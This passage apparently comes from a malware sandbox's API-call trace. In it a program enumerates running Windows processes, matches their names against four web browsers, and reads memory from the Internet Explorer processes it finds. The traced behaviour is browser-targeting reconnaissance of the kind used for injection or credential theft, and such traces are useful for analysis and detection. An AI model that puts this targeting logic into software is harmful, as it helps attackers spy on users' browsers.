	[0213.978] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0213.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.978] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.978] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0213.979] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x4234
	[0213.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.979] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0213.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.980] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.980] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0213.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.980] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.980] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0213.981] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x4238
	[0213.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.981] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0213.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.981] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.982] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0213.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.982] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.982] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0213.983] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x423c
	[0213.983] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.983] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0213.983] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.983] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.984] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0213.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.984] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.984] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0213.985] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0213.985] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0213.986] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x4240
	[0213.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.986] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0213.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.987] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.987] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0213.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.988] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.988] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0213.989] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x4244
	[0213.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.989] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0213.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.989] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.990] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0213.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.990] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.990] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0213.991] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x4248
	[0213.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.991] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0213.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.991] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.992] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0213.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.992] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.992] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0213.993] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x424c
	[0213.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.993] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0213.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.993] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.994] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0213.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.994] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.994] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0213.995] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x4250
	[0213.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.995] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0213.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.996] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.996] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0213.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.997] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.997] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0213.998] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x4254
	[0213.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.998] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0213.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.998] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.999] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0213.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.999] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.999] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0214.000] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x4258
	[0214.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.000] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0214.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.000] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.001] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0214.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.002] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.002] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0214.003] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x425c
	[0214.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.003] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0214.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.003] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.004] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0214.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.004] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.005] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0214.005] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x4260
	[0214.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.005] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0214.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.006] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.006] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0214.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.006] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.006] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0214.007] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x4264
	[0214.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.007] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0214.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.008] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.008] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0214.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.008] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.008] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0214.009] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x4268
	[0214.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.009] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0214.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.010] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.010] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0214.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.011] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.011] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0214.012] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x426c
	[0214.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.012] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0214.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.012] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.013] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0214.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.014] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.014] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0214.015] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x4270
	[0214.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.015] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0214.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.015] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.016] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0214.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.016] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.017] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0214.017] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x4274
	[0214.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.018] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0214.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.019] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.020] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0214.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.021] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.021] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0214.022] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x4278
	[0214.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.022] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0214.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.023] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.023] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0214.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.024] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.024] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0214.025] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x427c
	[0214.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.025] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0214.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.025] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0214.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.025] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0214.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.026] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.026] NtQueryInformationProcess (in: ProcessHandle=0x427c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0214.026] ReadProcessMemory (in: hProcess=0x427c, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0214.026] ReadProcessMemory (in: hProcess=0x427c, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0214.026] ReadProcessMemory (in: hProcess=0x427c, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0214.026] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0214.027] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0214.027] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x4280
	[0214.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.027] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0214.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.028] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0214.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.028] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0214.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.028] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.028] NtQueryInformationProcess (in: ProcessHandle=0x4280, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0214.029] ReadProcessMemory (in: hProcess=0x4280, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0214.029] ReadProcessMemory (in: hProcess=0x4280, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0214.029] ReadProcessMemory (in: hProcess=0x4280, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0214.029] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0214.029] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0214.030] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x4284
	[0214.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.030] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0214.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.030] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.030] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0214.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.031] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.031] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0214.032] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x4288
	[0214.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.032] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0214.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.032] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.033] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0214.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.033] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
